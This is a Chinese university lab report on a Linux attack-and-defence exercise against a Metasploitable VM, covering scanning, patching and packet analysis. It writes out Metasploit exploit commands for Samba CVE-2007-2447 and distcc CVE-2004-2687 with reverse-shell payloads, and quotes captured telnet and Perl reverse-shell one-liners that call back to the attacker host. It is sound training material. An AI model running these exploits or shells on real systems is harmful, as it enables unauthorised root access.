Linux系统攻防对抗实践

一、实践目的

通过Linux系统攻防对抗实践,加深对Linux系统的认识,同时掌握Linux漏洞入侵和架设防御的初步方法。

二、实践内容

在Metasploit渗透攻击框架软件中寻找一个针对Linux系统服务的渗透攻击模块,在网络安全攻防实验环境中部署有漏洞的环境(如渗透利用第三方网络服务,需要找到并安装存在特定漏洞的版本),并使用metasploit进行攻击。

攻击方使用Metasploit渗透软件针对Linux Metasploitable靶机实施网络攻击,防御方则在Metasploitatble上使用Tcpdump或Wireshark或Snort工具捕获攻击流,并分析出攻击者利用了哪个安全漏洞进行攻击,从官方网站上下载该安全漏洞补丁进行系统修补,双方合作给出攻防过程报告。

三、实验环境

为了完成本次实验,我们部署了如下的实验环境。

攻守双方使用两台笔记本电脑,并将它们直连成为一个局域网。在攻守双方的笔记本电脑上部 署Vmware Workstation软件,并分别建立攻击机、扫描机和防守机。其中攻方使用BackTrack4系统,并辅助使用WinXPattacker进行扫 描;守方使用Ubuntu 8.04-Metasploitable系统。

如下图,三台虚拟机使用Bridge方式联网,攻击机IP地址192.168.200.10,扫描机IP地址192.168.200.2;防守机IP地址192.168.200.11。

四、攻防实践过程

攻守双方首先将虚拟机启动起来,配置好网络环境并测试网络通畅后,攻守双发分别进行接下来的操作。

攻方过程

漏洞扫描及结果分析

为了确认防守方系统漏洞,攻方在扫描机上使用X-Scan 3.3对防守机进行了一次全面漏洞扫描。

其中防守机开启的服务和具体的漏洞如下,

查看详细的扫描报告,可以得知该主机很多重要信息,

a)   从139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3.0.20-Debian)”;

b)   主机系统中存在许多用户,共35个,其中被禁止的33个,存活使用用户user、msfadmin;

c)   系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;

d)   telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令。

攻击方式选择

根据上面的分析结果,最简单的攻击方式就是通过telnet使用user或msfadmin用户登录即可,但这样的攻击并不是我们的实验目的,因此我们暂时忽略系统弱口令的问题,通过第三方软件的漏洞获取系统的控制权。

从上面的漏洞扫描可以看出,防守机的漏洞很多,我们可以使用SMB漏洞、distcc漏洞等进行攻击。因为SMB是Samba软件的服务,而Samba服 务是运行在root权限下,所以一旦攻击成功,将获得权限为root的shell。我们本次实验主要使用SMB漏洞进行攻击,并尝试使用distcc漏 洞。

攻击入侵

完成了以上的分析,我们终于进入了今天的重头戏,攻击环节。

在命令行窗口输入命令

msfconsole

将开启我们要使用的攻击工具:metasploit,如下图,

首先,我们使用SMB漏洞对防御机进行攻击,并设定payload为reverse(在没有防火墙的情况下,选择任意的shell payload都是可以的,本实验的payload是任意选取的),依次输入如下命令,使用SMB漏洞对防守机进行攻击,

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost 192.168.200.11

set lhost 192.168.200.10

exploit

如下图,攻击后成功的获得了一个root权限的shell,攻击成功!

断开当前的连接,依次输入如下命令,使用distcc漏洞进行攻击。

back

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost 192.168.200.11

set lhost 192.168.200.10

exploit

如下图,攻击成功后出现一个可以使用的shell,但是没有root权限。

但继续输入命令时却没有反应,后证实是被防守方人为中断了。

为了使用更高权限的命令,我们需要root权限的shell。因此再次使用SMB漏洞进行攻击。在命令行下输入如下命令,

back

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost 192.168.200.11

set lhost 192.168.200.10

exploit

然后在获得的shell中输入reboot命令,如下图,

这时,防守机系统重启了,攻击成功!

守方过程

防守机上观察到的攻击迹象

在防守机启动之后,立即使用如下命令抓取系统接收和发送的报文,并将结果保存到result.cap文件中。

sudo tcpdump –s 00 –w result.cap &

然后等待一段时间后,使用如下命令查看系统进程,

ps –e | more

发现数个可疑的telnet进程,后来证实其为攻击时使用的shell。如下图,

果断将telnet进程杀掉。但随后不久,收到一个来自用户root的消息,机器便重启了……

报文分析

为了弄清楚重启的真正原因。当机器重启之后,果断断网。导出抓取的报文文件,并使用wireshark进行分析。

简单的查看抓取到的报文,在短短的30分钟内,一共有128768个报文。如此巨量的报文中,绝大多数报文都是成片的同一种协议的报文,如下图,

因此可以断定,攻击机正在进行扫描,而真正的攻击应该在最后。从后向前查看报文内容发现,倒数第二条报文是一个TCP数据包,其中报文的内容是正是reboot!可以断定正是这条命令导致了系统重启。

经过对报文仔细的分析,可以确定的攻击有三次,分别如下图所示,其中攻击的漏洞和携带的攻击脚本分别为,

漏洞名称 相关网址 攻击脚本 执行的命令
SMB漏洞 CVE-2007-2447 http://www.samba.org/samba/security/CVE-2007-2447.html nohup sh -c ‘(sleep 4495|telnet 192.168.200.10 4444|while : ; do sh && break; done 2>&1|telnet 192.168.200.10 4444 >/dev/null 2>&1 &)’ idusers
Distcc漏洞 CVE-2004-2687 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687 perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.200.10:4444”);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ idusers
同第一个 同第一个 同第一个 idreboot

漏洞修补

由于防守机是ubuntu系统,所以很容易将软件升级到最新版本。在命令行执行如下命令,

sudo apt-get update

sudo apt-get install samba

或者将相应的服务禁掉,

sudo /etc/init.d/samba stop

sudo /etc/init.d/distcc stop

但是升级distcc时会提示没有更新的版本,到其官网上下载最新版本,卸载旧版本并安装后可以修补漏洞。

五、攻防实践总结

实践中遇到问题和总结的经验,

攻方

a)   漏洞选择,因为有文档指出Metasploitable靶机存在的漏洞,所以在这个方向上可以减少攻击过程中尝试的漏洞;

b)   如果获得的shell权限不是root级别的,需要继续使用本地溢出进行提权,本人对这些漏洞信息掌握很少。

守方

a)   抓取的报文数量巨大,从中找出有用的信息比较困难。

b)   从攻击的过程中推测被利用的漏洞必须具备相当的背景知识,并且需要熟练运用搜索引擎和官方网站。

link:http://netsec.ccert.edu.cn/cnsc/2011/06/19/linux%E7%B3%BB%E7%BB%9F%E6%94%BB%E9%98%B2%E5%AF%B9%E6%8A%97%E5%AE%9E%E8%B7%B5/

本文作者清华信安实验室由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。